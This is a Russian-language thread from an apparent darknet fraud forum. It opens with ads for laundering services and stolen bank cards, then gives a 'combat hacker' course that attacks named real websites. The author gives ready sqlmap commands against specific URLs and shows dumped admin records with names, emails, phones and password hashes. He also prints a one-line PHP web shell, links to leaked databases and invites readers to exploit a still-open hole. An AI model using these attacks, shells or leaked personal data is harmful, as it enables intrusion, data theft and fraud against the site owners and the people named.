TARANTINO OBNAL SERVICE №1 на рынке теневых услуг.
Депозит 1 млн.


✔️ Профессиональное сопровождение любых финансовых операций.

✔️ Россия, страны СНГ и Европы:

  • ➢ ФИЗ / ЮР лица
  • ➢ Мерчанты
  • ➢ ЭПС
  • ➢ Sim-карты
  • ➢ Работа с криптой по всему миру
  • ➢ Денежные переводы
ПЕРЕЙТИ К ТЕМЕ

ДЕБЕТОВЫЕ КАРТЫ СБЕРМАРКЕТ
  • ⭐️ Пожизненная гарантия от краж.
  • ⭐️ Все в наличии. Экспресс-доставка. Лучшие цены.
  • ⭐️ Ветка 2021 года. Сотни отзывов.
  • ⭐️ Статус Ветеран на ДаркМани.
  • ⭐️ Депозит миллион ₽.
КАРТЫ РФ 🇷🇺
КАРТЫ ГРУЗИИ 🇬🇪
ЛК КАЗАХСТАНА 🇰🇿


БОЛЕЕ 1000 КОМПЛЕКТОВ ДРУГИХ ТОПОВЫХ БАНКОВ ВСЕГДА В НАЛИЧИИ

>>> ПЕРЕЙТИ К ТЕМЕ <<<
Telegram: https://t.me/SberMarketTG

У форума есть зеркало в Тор http://darkmonn6oy55o7kgmwr4jny2gi2zj6hyalzcjgl444dvpalannl5jid.onion
Официальный канал Darkmoney в Телеграм https://t.me/+k1c69d6xQsswYzU0
NEW! 🔥 Чат Darkmoney в Телеграм https://t.me/+q40pcoHjSRVmNTE0

Учебный курс боевого хакера! Бесплатно! Цикл первый! Атакуем ua-region.info

  • Автор темы Автор темы FuWhite
  • Дата начала Дата начала

FuWhite

НЕ ПРОВЕРЕН
Регистрация
22.10.14
Сообщения
23
Привет, ребятки!

В этом цикле статей я поведаю вам о том, как мочить терриристов в сортире, упс, взламывать сайты, тырить корпоративные секреты и все такое.

Все примеры будут проведены на реальных сайтах, владельцы которых и не будут подозревать о том что их взламывают в прямом мать вашу эфире.

Итак, для чего ломать сайты?

Епать, вы этого не знаете? :D

Ладно, пох, расскажу.

Давно давно, когда на слуху были еще карточки интернет доступа, модем в 56кб/с и бесплатный интернет в ночное время, сайты взламывали чтобы поприкалываться.

Разместить картинку с письками женского рода - это был верх совершенства. А еще были войны между различными группировками, когда Зайцы Запада ломали сайты Драконов Востока.

Но потом в инете стали зарабатывать бабло, появились первые интернет магазины и пошло поехало.

Итак, сайты ломают для:

- У меня писун больше, чем у тебя, вот тебе по сайту куем или говоря нормальным языком - дефейс. Практически мертвый вариант. Помните как раньше многие ресурсы по сетевой безопасности держали ленту взломанных дефейснутых ресурсов? Конечно, сайты взламывают чтобы сделать дефейс, но обычно это происходит с ресурсами которые отражают неправильную политику партии

- взлом с целью кражи конфине, конфици, конфедци, пля, секретной информации. Есть фирма, есть сайт, есть локальная сеть конторы - задача, проникнуть, вытащить нужную информацию, предоставить заказчику. Делается строго по заказу. Редко, когда обычный хакер, ломает контору, чтобы потом полученные данные скормить конкурентам. Ибо пля рискованный и энергозатратный вариант. Без подготовки (а на это нужны бабки) никуда.

- взлом с целью установления контроля над сервером. Цель: поставить VPN, использовать для брута или рассылки спама, для проведения других взломов и т.д.

- взлом с целью получения бабла:
-- если посещаемый ресурс, установка сплоит пака и в дальнейшем продажа загрузок или слив трафика
-- если сайт продает что то информационное, то получение этой информации и дальнейшая перепродажа на черном рынке
-- если сайт приносит бабло владельцам, то блокировка сайта с требованием бабла за типо анализ безопасности веб проекта
-- если это интернет магазин, то мошеничество против клиентов или атака против интернет магазина (оплата на левые кошельки по заказам клиентов)

- взлом как месть: пи*дец дебильный вариант, но имеет право быть. Дебильный потому что норм сайт восстанавливается из бэкапа. Единственный вариант, это ломать мыло админа, получать доступ к хостингу. В этом случае, хозяин будет несколько дольше восстанавливать доступ к ресурсу.

- легальные взломы. Ну это типо когда по заказу владельца проекта осуществляется взлом с целью установления дыр и их дальнейшее закрытие

Короче в общих чертах сайт ломают или для получения контроля (для неких плюшек) или для получения бабла (в разных вариациях)

С этой куйней разобрались, поехали дальше.

Чтобы ломать сайты и проникать во все жопы, эм, дыры, нужно настроить безопасное окружение.

Идея пля проста и понятна и хочу чтобы вы запомнили и выбили эту мысль себе татуировкой на пятой точке.

Вы используете обычные интернет для ваших обычных повседневных действий. Смотрите порнушку, дро*ите на картинки, зависаете в социальных сетях. Даже если вы хотите почитать статью о новых дырах в вордпресе, вы не делаете этого через нормальный повседневный интернет. Вбейте это себе в башку.

Вы используете анонимный интернет для всех темных дел и для чтения всей сопутствующей документации.

Ну погнали, кролики

Настраиваем анонимное окружение

Первым делом берем Трукрипт отсюда https://truecrypt.ch/downloads/ - не боись, это норм версия

Вторым качаем два образа Whonix отсюда https://www.whonix.org/wiki/Download#Install_Whonix, Gateway и Workstation

Это система на основе Debian для анонимного серфинга и работы в интернете. Все соединения из Workstation идут на Gateway, которые в свою очередь сыплются через ТОР. Не суть важно, запускаете вы SqlMap или Nmap - все соединения через ТОР.

Итак, создаем зашифрованный раздел, примерно 10-12 гигов.

Качаем и ставим VirtualBox. Запускаем и импортируем первый образ Whonix Gateway. Все оставляем как есть, кроме месторасположения файла с виртуальной машиной (указываете путь на ваш зашифрованный диск). Точно также импортируем и второй образ Whonix Workstation (именно на нем вы и будете работать).

Вы должны уметь и понимать работу в линукс подобных системах, это мануал не об этом. И здесь я ни слова обучающего не скажу о линукс.

Запускаем Gateway, ждем когда установиться и настроиться, пройдет все проверки. Затем запускаем Workstation.

Ну типа все. У нас есть готовая дебиан система на зашифрованном диске, с которой мы будем мочить сайты.

Конечно с этой системы вы можете ломать сайты, проникать в корпоративные сети, но лучше сделать так:

- взломать какой нить сервер, установить контроль, поставить туда нужный софт и доступ к этому серверу осуществлять с Whonix'а

Т.е. Whonix используем для доступа к взломанному серверу, с которого уже ломаем все остальные.

Ну че, приступим к взлому?

А х*ли ждать

Кого будем ломать?

Наткнулся я тут на сайт, который продает информационные базы biz-gid.com (он же business-guide.com.ua). Базы предприятий Украины. Короткий анализ выдал, что сайт входит в группу порталов (все связаны с продажей информационных баз наивным клиентам и оказанием услуг, типа сео и все такое).

Итак наши цели быстро определились

ua-region.info (ua-region.com.ua)
dlab.com.ua
databases.com.ua
biz-gid.com (.ru, business-guide.com.ua)

Наша цель не состояла в том, чтобы проникнуть в локальную сеть предприятия. Нам нужен только контроль над сервером или серверами.

Поэтому идем в гугл и пишем что нить в таком роде inurl:.php? site:biz-gid.com

Такой запрос найдет нам все скрипты с параметрами на сайте biz-gid.com

Линки проверяем вручную, тупо подставляя различные спецсимволы, в первую очередь ' и смотрим на реакцию сервера. Если выдает ошибку или возвращает страницу отличную от вывода с правильным параметром, загоняем урл в sqlmap

Что такое sqlmap - это тулза для автоматизации скул иньекций.

К сожалению, на биз гиде стоял mod_rewrite и все пхп скрипты были спрятаны и реврайтились сервером. Поэтому пришлось оставить гугл и вручную смотреть сайт. Очень очень скоро находим линк типа biz-gid.com/about/articles_bg?id=76

Пишем в параметр кавычку, получилось так biz-gid.com/about/articles_bg?id=76' и видим пустую страницу.

Вуаля, есть вектор для атаки.

Загоняем в SQLMAP (sqlmap: automatic SQL injection and database takeover tool)

python sqlmap.py -u "biz-gid.com/about/articles_bg?id=73" --threads 10 --random-agent -b --current-user --current-db --dbs --exclude-sysdbs --tables

Этот запрос делаем из Whonix.

Если запускает sqlmap просто с компа с установленным тором, тогда запрос такой
python sqlmap.py -u "biz-gid.com/about/articles_bg?id=73" --threads 10 --random-agent -b --current-user --current-db --dbs --exclude-sysdbs --tables --tor --check-tor --tor-port 9150 --tor-type SOCKS5

О параметрах скулмапа читайте сами в мануале на сайте.

После сканирования получаем ответ

Код:
sqlmap identified the following injection points with a total of 60 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=73 AND 3669=3669

    Type: UNION query
    Title: MySQL UNION query (NULL) - 4 columns
    Payload: id=-8581 UNION ALL SELECT NULL,NULL,CONCAT(0x7164776b71,0x4447436e417a6a6a476e,0x7172756c71),NULL#
---
web application technology: PHP 5.3.9, Apache 2.2.17
back-end DBMS: MySQL >= 5.0.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=73 AND 3669=3669

    Type: UNION query
    Title: MySQL UNION query (NULL) - 4 columns
    Payload: id=-8581 UNION ALL SELECT NULL,NULL,CONCAT(0x7164776b71,0x4447436e417a6a6a476e,0x7172756c71),NULL#
---
web application technology: PHP 5.3.9, Apache 2.2.17
back-end DBMS: MySQL 5
banner:    '5.5.20-log'
current user:    'bg@%'
current database:    'bg'
available databases [4]:
[*] bg
[*] information_schema
[*] kievmap
[*] meccano

Йохуууу. У нас есть доступ к базе данных. Осталось за малым найти админку, логин и пароль админа, закачать шелл и рутнуть сервак...

Ну что писать продолжение? Интересная тема?

Пишите, что вы боялись спросить, но хотели бы узнать.

Ах, да, чуть не забыл. Авторство мое, но вы можете использовать весь цикл статей по своему усмотрению. Выдавать его за свой, получать с лохов бабло за обучение и все такое.

Пожертвования слать на кошелек биткоин 161LNBVTzVTZKq95E4dX7M4i3yVxHdndGS

Если данный цикл статей вам помог и оказался полезным или вы успешно стали ломать и получать бабло с сайтов, но ни одного битка не отправили мне, автору, этого глобального опуса, пусть пля удача от вас отвернется и карма засорится, а отдел К отрежет вам яйца...

Всё! До следующих встреч...
 
Переношу в Безопасность и анонимность, тут у вас будет больше читателей.
 
Омг проект тру крипта умер,сами разрабы писали,что лучше его не юзать . Такое ощущение копирайт 2010 года
 
Омг проект тру крипта умер,сами разрабы писали,что лучше его не юзать . Такое ощущение копирайт 2010 года

это полседня версия а тут стабильная 7.1а\

прожуй прежде чем говорить
 
Внимание: этот пользователь заблокирован! Настоятельно рекомендуем воздержаться от любого сотрудничества с ним!
Критика

Извини за критику, но хочу показать минусы в твоей теме:
- "Учебный курс боевого хакера!" - Это первая часть твоей темы. По моему мнению более подошла бы название: "Взлом для нубов". Так как способ, описанный в статье давно "прохаван", и это можно найти в паблик, с помощью запроса "Google dorks".
- Следующее, это то, что твоим способом можно взломать только "********** сайты", и только с помощью "автомата" - sqlmap.
- Существует гораздо больше уязвимостей, чем описанные в данном способе, а крутить SqInj с помощью SqlMap - это не взлом.
Извини, что вмешался, ведь критика это хорошо, а человек, который воспринимает критику положительно, - это человек, который развивается. Спасибо)
:)
 
Извини за критику, но хочу показать минусы в твоей теме:
- "Учебный курс боевого хакера!" - Это первая часть твоей темы. По моему мнению более подошла бы название: "Взлом для нубов". Так как способ, описанный в статье давно "прохаван", и это можно найти в паблик, с помощью запроса "Google dorks".
- Следующее, это то, что твоим способом можно взломать только "********** сайты", и только с помощью "автомата" - sqlmap.
- Существует гораздо больше уязвимостей, чем описанные в данном способе, а крутить SqInj с помощью SqlMap - это не взлом.
Извини, что вмешался, ведь критика это хорошо, а человек, который воспринимает критику положительно, - это человек, который развивается. Спасибо)

Привет, бро!

Благодарю за отзыв, но согласно твоей логике, если мы видим окуенно укрепленное здание, обшитое листами бронированного стекла с единственной дверью из 2-метровой углеродной стали, рядом с которой 20 тяжеловооруженных амбалов, то мы должны ломиться в эту дверь, используя танки, рпг и другое вооружение вместо того, чтобы залезть в забытое вентялиционное отверстие.

То же самое и со скул иньекциями. Если можно просто влезть на сервак через уязвимость веб приложений, зачем сканировать порты, искать эксплоиты под сервак?

Как говорится, будь проще, а дыры найдутся
 
Внимание: этот пользователь заблокирован! Настоятельно рекомендуем воздержаться от любого сотрудничества с ним!
человек, который воспринимает критику положительно, - это человек, который развивается.
После таких слов он даже подумать о грубости в твой адрес не может.
 
Внимание: этот пользователь заблокирован! Настоятельно рекомендуем воздержаться от любого сотрудничества с ним!
Внимание: этот пользователь заблокирован! Настоятельно рекомендуем воздержаться от любого сотрудничества с ним!
как нуб во взломе, да и вообще любой человек который чему то учится по тексту, хотел бы видеть более грамотно написанный контент. читать мужика прикинувшегося ПугоФФкой, как по мне не очень.
По содержанию - если курс для новичков, его надо тщательнее разжовывать
 
Внимание: этот пользователь заблокирован! Настоятельно рекомендуем воздержаться от любого сотрудничества с ним!
читать мужика прикинувшегося ПугоФФкой, как по мне не очень.
Мой учитель по вождению так же разговаривал: "гляди **ять какая фифа идёт, посигналь".
Ну а чё, у автора оригинальный подход.

Итак, для чего ломать сайты?
Епать, вы этого не знаете?
Ладно, пох, расскажу.
Ну погнали, кролики.
А х*ли ждать.
 
Последнее редактирование:
Походу я пока ничего писать не могу, пока мои мессаги не проверят :(
 
Я тут смотрю моя пуговка тут кого то реально испугала? :D У меня еще болт в запасе есть :D:D

Давайте определимся вот с какой херней. Если собираешься проникать туда, куда нельзя, то:

1. Определяем все возможные точки входа (разведка), а это:
-- все возможные доменные имена и поддомены
-- данные об используемых веб приложениях
-- данные о серваках, на которых висят сайты
-- сотрудники
-- мыла и вся другая контактная инфа

2. Если на серваках чисто и ничего не можешь найти, запускаем Nikto (о нем чуть позже)

3. Выясняем самое слабое звено, проникаем, пытаемся вытащить максимум возможного или установить максимум возможные права

Если работка не по заказу или не идейная и у тебя ничего не выходит, плюй и двигай дальше, серваков на всех хватит.

Ладно, детки сели в круг будем хавать сухофрукт...

В прошлой серии мы выяснили, что у сайта биз гида есть иньекция, уязвимость, которая позволяет читать данные из базы данных сайта.

Мы также выяснили имя текущего пользователя (параметр скул мапа --current-user) и имя текущей базы данных (параметр --current-db). Теперь нам нужно выяснить права для этого юзера. Если права все, то мы сможем читать и писать в файлы, что было бы круто и мы получили бы управление над сервером.

Для того чтобы выяснить права используем параметр --privileges

Для биз-гида права USAGE, короче самые обычные, без доступа к файловой системе :mad:

Вот куйня так куйня. На самом деле рутовские права встречаются крайне редко и когда такое происходит на 99.5% можно быть увереным в успешном взломе.

Ну и по*уй

Когда получили доступ к базе, первым делом что нужно сделать - это найти таблицы с пользователями и админами.

Обычно таблицы именнуют с запоминающимися названиями. Никто же никогда не верит, что именно его сайты натянут на куй и сольют всю базу в сеть :D:D гы гы

На биз гиде таковыми таблицами оказались:

customers, customers_before2012, users, xopen_users, xopen_accounts - первые три относятся к основному движку проекта, а вот две последние (опять же гугл в помощь) относятся к движку OpenX - движок для прокрутки банеров.

На самом деле ********атая тема, если неполучится установить контроль, то можно закатать на прокрутку банеры на какую нить партнерку, да те же епаные рунетки к примеру.

Получаем дамп таблицы xopen_users с параметрами -T xopen_users --dump

Код:
web application technology: PHP 5.3.9, Apache 2.2.17
back-end DBMS: MySQL 5
Database: bg
Table: xopen_users
[1 entry]
+---------+-------------+--------------------+--------+----------+----------+----------------------------------+------------+--------------+--------------+--------------------------+---------------+---------------------+
| user_id | sso_user_id | default_account_id | active | username | comments | password                         | language   | date_created | contact_name | email_address            | email_updated | date_last_login     |
+---------+-------------+--------------------+--------+----------+----------+----------------------------------+------------+--------------+--------------+--------------------------+---------------+---------------------+
| 1       | NULL        | 3                  | 1      | editor   | NULL     | 7b91469c45e48c0e9815374250187f97 | ru         | NULL         | Your Name    | [email protected] | NULL          | 2014-10-23 11:17:39 |
+---------+-------------+--------------------+--------+----------+----------+----------------------------------+------------+--------------+--------------+--------------------------+---------------+---------------------+

Пароль хешированный, ну покуй.

Копируем и звидошим на hashkiller.co.uk, получаем пароль в чистом виде.

Если вам нужен взломать захешированный пароль лучшего сайта чем hashkiller.co.uk я пока не встречал. Там базы не только паролей в md5, но двойной md5 и короче еще куева туча вероятных алгоритмов.

Епать, пароль то есть, но где епаная админка OpenX?

Пора запускать fierce (Fierce Domain Scan)

Эта такая перловская ху*та, которая делает запросы к днс и вытаскивает нам поддомены

Также может вытащить хосты с нужного диапазона ип адресов.

Наш запрос такой perl fierce.pl -dns biz-gid.com

Долго думает скриптик, а потом выдает что то вроде

Код:
Trying zone transfer first...
         
Unsuccessful in zone transfer (it was worth a shot)                                                                                            
Okay, trying the good old fashioned way... brute force                                                                                         
            
Checking for wildcard DNS...                                                                                                                   
        ** Found 97698173655.biz-gid.com at 77.120.97.93.                                                                                      
        ** High probability of wildcard DNS.                                                                                                   
Now performing 2898 test(s)...
77.120.99.119   i.biz-gid.com
194.0.200.218   mail.biz-gid.com

Subnets found (may want to probe here using nmap or unicornscan):
        194.0.200.0-255 : 1 hostnames found.
        77.120.99.0-255 : 1 hostnames found.

Done with Fierce scan: http://ha.ckers.org/fierce/
Found 2 entries.

Have a nice day.

Никуя интересного. Нашли сервак для обработки изображений и мыльный поддомен.

Опять гугл, опять зовет, опять твою мать он песенки нам поет...

Простите я бухой, отвлекся немного...

Пока составляем запросы, питочим на urlfind.org и вкуячиваем туда биз-гид и находим неожиданно админку OpenX OpenX

******к, ******к, мы внутри.

Тут должно быть много слов как я пробовал закатать шелл через эту куйню, но не вышло...

Кстати о шелле. Шелл это такой скриптик, который позволяет выполнять команды операционки. Лучшего шелла чем Weevely (Weevely by epinna) я не встречал, хотя иногда достаточно и вот такого варианта

Код:
<?php

if(isset($_GET['c'])) echo "<pre>"; passthru(base64_decode($_GET['c'])); echo "</pre>";

Например, закачивать файлы ты не можешь, а вставить код в уже существующий можно. Тогда этот мелкий шелл станет твоим промежуточным шеллом.

Куда побежали, плять? Шелл потом достанете...

Через OpenX шелл залить не удалось.

Ну что же тогда нужно искать админку сайта.

Как искать на твое усмотрение. Если сайт написан не на популярной CMS, то придется поизвращаться выискивая админку.

Ну можно использовать опять же гугл, запросы типа "Администрирование" site:biz-gid.com и тому подобное

Ну я так делать не стал, потому что предварительно уже увидел что в таблице customers есть поле customer_type, кстати чтобы получить список полей какой то таблицы в скул мапе делаем такой запрос -T название таблицы --columns

Удобно когда надо найти таблицы с паролями

Короче, пля, ясно что у некоторых юзеров есть админ права.

Открываем скул шелл из скул мапа, опция --sql-shell

и делаем запрос select * from bg.customers where customer_type != 0 - короче выбираем всех пользователей, у которых не нулевые права и получаем список админов и менеджеров

Код:
web application technology: PHP 5.3.9, Apache 2.2.17
back-end DBMS: MySQL 5
select * from bg.customers where customer_type != 0 [14]:[*] 1, 0, 2014-10-23 15:58:33, 1, 0, Евгений, 41129, , Пикалов, 2014-10-23 15:06:58, [email protected], , 202cb962ac59075b964b07152d234b70, , 0000-00-00 00:00:00, , 0000-00-00 00:00:00[*] 1, 0, 2014-10-23 15:00:36, 1, 0, Елена, 41927, , , 2014-10-23 11:05:44, [email protected], , 02d51633452b1c51b15c1531b19e36e7, 2239526, 2008-12-15 12:01:48, 62f5a8739ceac924f203574b7c8f81f2, 2010-08-19 10:42:01[*] 1, 0, 2014-10-22 14:32:33, 1, 0, Антонов, 41929, Зам. директора, Алексей Николаевич, 2014-10-22 14:09:56, [email protected], , 39c9f8542267dfa436c7c40b05211576, 8 (044) 537 28 07, 2008-12-15 13:20:52, dc175e1d5308a2630569442cb3f5b8ab, 2012-03-15 15:38:13[*] 1, 0, 2014-10-23 15:43:00, 1, 1, Вита, 64024, 1, 1, 2014-10-23 11:23:42, [email protected], , e10adc3949ba59abbe56e057f20f883e, 1, 2009-12-07 11:53:37, , 0000-00-00 00:00:00[*] 1, 0, 2014-10-22 17:56:05, 1, 0, Евгений Владимирович, 82729, , Крылов, 2014-10-22 15:19:38, [email protected], , 81dc9bdb52d04dc20036dbd8313ed055, 229-81-01, 2011-02-09 11:07:04, , 0000-00-00 00:00:00[*] 1, 0, 2014-10-23 10:10:41, 1, 1, Admin, 83448, , Maawal, 2014-10-22 18:27:28, [email protected], 0931421736, 6cd87f824892ab83050574d251e70c3a, 0445372807, 2011-02-21 18:22:11, 54d5a3b021daebf603714730e31a67bf, 2014-07-11 18:19:12[*] 1, 0, 2014-10-22 13:41:29, 1, 0, Евгений, 98892, Директор, Крылов, 2014-10-13 11:53:59, [email protected], 050 387 16 45, ec0752e5dbcf84c554752569e3e82cb8, (044) 277-42-05, 2012-03-19 16:55:36, , 0000-00-00 00:00:00[*] 1, 0, 2013-01-27 23:26:27, 1, 1, Дмитрий, 99216, Администратор, Краснов, 2013-01-20 20:35:34, [email protected], +79533641285, 8c01e2c451c5ecaa62edd109b6d30a93, 8123450307, 2012-04-05 08:09:00, , 0000-00-00 00:00:00[*] 1, 0, 2014-10-23 10:32:20, 1, 1, Михайло , 102022, директор, Троц, 2014-10-22 16:13:29, [email protected], , b04524d63dbf487b27a72c845fe57b62, 097 755 43 66, 2012-08-20 19:23:07, 6d77daac3cfecfa9385a1c87abcddb56, 2014-09-17 12:18:00[*] 1, 0, 2014-10-22 14:56:24, 1, 0, Александр, 105121, , Длабик, 2014-10-22 10:30:42, [email protected], , 665d5a5c28f5beae6a1613d6a6b5211e, 097-2891861, 2013-02-01 10:50:44, , 0000-00-00 00:00:00[*] 1, 0, 2014-05-16 10:37:09, 1, 0, Михайло, 105133, директор, Слишик, 2014-04-04 11:34:21, [email protected], , e55243c8aff1f3872e98d9e4c9530e1b, 044 2447819, 2013-02-01 15:16:48, , 0000-00-00 00:00:00[*] 1, 0, 2013-06-14 14:06:43, 1, 0, Наталия, 107669, менеджер, Самарская, 2013-06-14 13:59:54, [email protected], 050-078-26-72, 39dcaf7a053dc372fbc391d4e6b5d693, 044-277-42-05, 2013-06-06 15:25:59, , 0000-00-00 00:00:00[*] 1, 0, 2013-10-04 11:22:17, 1, 1, Роман, 108010, Борисович, Некраш, 2013-10-04 09:38:47, [email protected], +380963389333, c8cea4a06227f6b08d53d04dee62eaf9, 0642429044, 2013-06-27 16:22:24, , 0000-00-00 00:00:00[*] 1, 0, 2013-04-03 12:20:38, 3, 0, Sasha, 100357, Директор центра мира, Bokov, 2013-04-03 12:14:29, [email protected], 068444444, e9c319f539f232f80449e6af1ea841bf, 068444444, 2012-05-17 13:03:08, , 0000-00-00 00:00:00

Кормим хешкиллеру и заходим под админами

Но и тут облом с шеллом. К этому моменту мне уже порядком заепал этот сайт, к тому же работа эта была не под заказ. Поэтому на этом моменте я просто слил базу пользователей.

И перешел к следующему ресурсу.

ua-region.info

Все эти порталы кстати созданы одним чуваком.

Находим очередную дыру

Код:
web server operating system: Linux Fedora 20 (Heisenbug)
web application technology: Apache 2.4.6, PHP 5.4.16
back-end DBMS: MySQL 5.0
banner:    '5.5.31-log'
current user:    'u61618@localhost'
current database:    'u61618'
available databases [9]:[*] blog_dlab[*] c[*] crm_lviv_ua[*] dlab_db[*] information_schema[*] mysql[*] performance_schema[*] test[*] u61618

И тут, внимание, джек пот, пользователь u61618 с рут мать вашу правами.

Это пи*дец какая дыра в конфигурации сервера.

Заливаем шелл через блог (стоял на вордпресе, уже отключен) и проникаем внутрь.

Делаем дампы и сливаем в сеть.

Кстати, все дампы в одном месте http://pastebin.com/MDHjY87y

Пользуйтесь, кому надо.

Дыра на ua-region.info до сих пор не закрыта, права у пользователя до сих пор рутовские. Так что кто хочет может пошалить...

Пожертвования слать на кошелек биткоин 161LNBVTzVTZKq95E4dX7M4i3yVxHdndGS

Если данный цикл статей вам помог и оказался полезным или вы успешно стали ломать и получать бабло с сайтов, но ни одного битка не отправили мне, автору, этого глобального опуса, пусть пля удача от вас отвернется и карма засорится, а отдел К отрежет вам яйца...

Всё! До следующих встреч...
 
- А не еб_ануть ли мне Тбилиси? - подумал хакер, глянув в сторону обитого черной кожей дивана.
Тбилиси же однако не разделяла энтузиазма потного мужика и, махнув пушистым хвостиком спрыгнула с нагретого места и убежала в коридор...наверное ловить мышей.

- Ну и мысли, - уже вслух сказал хакер, и спрятав прибор для передачи генетической информации обратно в штаны, уставился в монитор.

Ну, привет, кролики

Давайте, давайте садимся в кружок, будем мы ломать утюжок, эм, очередной сайт.

Сегодня в уроке будем ломать сайт в зоне РУ, в рунете.

Но тут нужно сделать отступление типа или даже предупреждение для особо тупорылых и дебилоидов.

Если у тебя не заказ, то нех_уй ломать сайты в стране фактического нахождения. И особенно, если ты муди_ла ломаешь сайты для получения бабла.

Короче я предупредил, но выбор за тобой.

Сегодня мы атакуем сайт по продаже чего то, пока не скажу чего. В конце, когда у нас будет или не будет шелл, вся инфа будет открыта

1. Собираем информацию

1.1 Запрос в whois
Кстати, для доменов ру и рф, можно юзать сервис who.ru (типа аналог who.is), показывает все изменения по доменым записям с момента его регистрации.

Итак хуис выдал

Код:
domain: не скажу
nserver: ns1.1gb.ru.
nserver: ns2.1gb.ru.
state: REGISTERED, DELEGATED, VERIFIED
person: Private Person
registrar: RU-CENTER-RU
admin-contact: https://www.nic.ru/whois
created: 2009.09.14
paid-till: 2015.09.14
free-date: 2015.10.15

Запрос в ху.ру

person: Private Person
e-mail: ххххххх@1gb.ru

Идем в 2ip.ru, тыкаем показать все сайты на одном айпи и находим еще один сайт.

Опять запрос в ху.ру и находим второе админ мыло

e-mail: ***@nm.ru

1.2 Собираем инфу о поддоменах при помощи fierce.pl, запрос типа perl fierce.pl -dns наш_сайт

Никуя интересного не получаем, поэтому сюда нах не пишу.

1.3 Какой то необычный, вероятно самописный движок на сайте, поэтому можно запустить никто (это сканер, который найдет все стандартные папки, ошибки в конфигурации и так далее). perl nikto.pl -host наш_сайт -Display on -output file.txt - отображаем все на экран + пишем в файл

1.4 Пока суть да дело, куярим в гугл и пишем inurl:.php? site:наш_сайт

2. Атакуем.
2.1 Запускаем по найденым урлам с параметрами скулмап и наслаждаемся найденными дырами

Код:
sqlmap identified the following injection points with a total of 42 HTTP(s) requests:
---
Place: GET
Parameter: str_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: str_id=10105 AND 5305=5305&brand_id=517&sid_td=7156&typid=26009

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: str_id=-6478 UNION ALL SELECT NULL,CONCAT(0x71736c6e71,0x687a714a66696f74566b,0x7169666f71)#&brand_id=517&sid_td=7156&typid=26009

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: str_id=10105 AND SLEEP(10)&brand_id=517&sid_td=7156&typid=26009
---
web application technology: Nginx, PHP 5.2.1
back-end DBMS: MySQL 5.0.11
banner:    '5.5.16'

К моменту, когда это закончится, Никто уже найдет несколько категорий со списком файлов, но об этом позже...
 
Последнее редактирование:
Внимание: этот пользователь заблокирован! Настоятельно рекомендуем воздержаться от любого сотрудничества с ним!
Слишком литературно-оригинально, но читается легко и с интересом и "чувствуется лапа Корейко".
Да! Действительно достаточно размыто для новичков(
 
Эй, хлопцы,

Тут люди говорят, что слишком размывчато для новичков, поэтому прошу если что непонятно задавайте сюда же свои вопросы.

Все, всем разбежаться и искать цели...
 
В дверь стучали, громко и настойчиво, долбили ногами, запахло жаренным, нет, не мясом, а сгорающей сталью двери, разогретой газосваркой.

Хакер, склонившись над разобранным компом, долбил молотком по винту.

- Достали с_уки, еб_анный китайский молоток, никуя не ******_шит, - кошка Тбилисси забралась под диван и не понимала что происходит.

Последнее, что увидел хакер, это кроссовок фирмы найк, который почему то очень быстро приближался к лицу...

Привет, хлопцы

Если вы думаете, что так происходит задержание хакеров, то глубоко заблуждаетесь. Конечно это наверное очень круто, прям как в фильме Хакеры (тот самый который с великолепной телочкой Джоли в главной роли), но на самом деле задержание подозреваемых происходит точно также как и в случае с обычными преступниками.

К вам подойдут в тот самый момент, когда вы будете выходить из машины, заходить в подъезд, остановлены гайцем для проверки документов, короче тогда когда вы не будете этого ожидать.

Не будем о плохом, а типа продолжим нашу серию супер уроков по сайто разрушительству.

А давайте сегодня поговорим про скулмап, ту самую прогу, которая позволяет автоматизировать получение информации из взломанных баз данных.

Качать типа отсюда sqlmap: automatic SQL injection and database takeover tool

Но сначала почему такое возможно. Короче, для особо тупорылых, не желающих понимать основы различных уязвимостей, говорю простым языком.

Не проверенные данные, которые передаются от юзеров сайта скриптам этого самого сайта, могут привести к ошибкам, которые позволяют вытащить из базы данных информацию, которая не предназначалась для вывода в данном текущем запросе.

Че глаза вытаращил? Щас б_ля лопнут

И дупло закрой

Допустим. Есть сайт который по запросу выводит информацию о каком то продукте. Что то типа /index.php?id=500
Т.е. выводим из таблицы запись с айди 500. Так вот, если дебил программер забыл проверять данные, то нам ничего мать вашу не мешает вместо 500 указать все что угодно.

Например, 500 union select login,pass from users, а что делает юнион? Пи_здуй на мускул и изучай скул документацию.

Короче, в ручном режиме перебирать информацию полная ********, и к тому же, помимо юнион инъекции существует еще error based и time based

Пля, пи_здец у тебя точно щас глаза лопнут

Поэтому одни умные спецы создали такую прогу как скул мап.

Сначала тебе нужно изучать жертву сайт. Если сайт написан на какой то самописной системе, то шансы на то, что в нем есть скул инъекция существенно увеличиваются.

Если сайт написан на известной куйне типа вордпресс и т.д., то нет смысла долбить скулмапом, кроме случаев когда в коде сайта обнаруживаются сторонние модули и плагины.

Итак, у тебя есть сайт. Ты смотришь в код, если замечаешь особенность какого то движка, то мануально изучаешь сайт.

Ну пиз_дец, штаны на место верни... Мануально это типа вручную, глазками, а не через анус

Если сайт непонятно на чем написан, идешь в гугл и пишешь что нить типа

inurl:.php? site:твой сайт

или

inurl:.aspx? site:твой сайт

зависит от используемой платформы

Гугл найдет тебе все линки или не найдет ничего. Если пусто, идем и ручками ищем параметры, которые передаются скриптам.

Вариантов тут немного:

1. Гугл нашел линки, например, /page.php?page_id=1340

В этом случае в скул мап ставишь запрос sqlmap.py -u "http://твойсайт/page.php?page_id=1340" конечно не забывая про параметры подключения к тору (если работаешь без whonix, о котором мы говорили несколько уроков назад)

2. Гугл нашел линки типа /page/id/1340 в этом случае в скулмап пишешь sqlmap.py -u "http://твойсайт/page/id/1340#" - вместо # скулмап будет подставлять иньекции

3. Гугл ничего не нашел или линки вообще без параметров, но на сайте есть формы (поиск, авторизация и т.д.). Здесь пишем в скулмап -u "твойсайт" --forms Прога найдет форму, спрашивает тебя хочешь ли ты ее тестировать или нет и пытается прокуячить иньекцию через пост запросы в форме

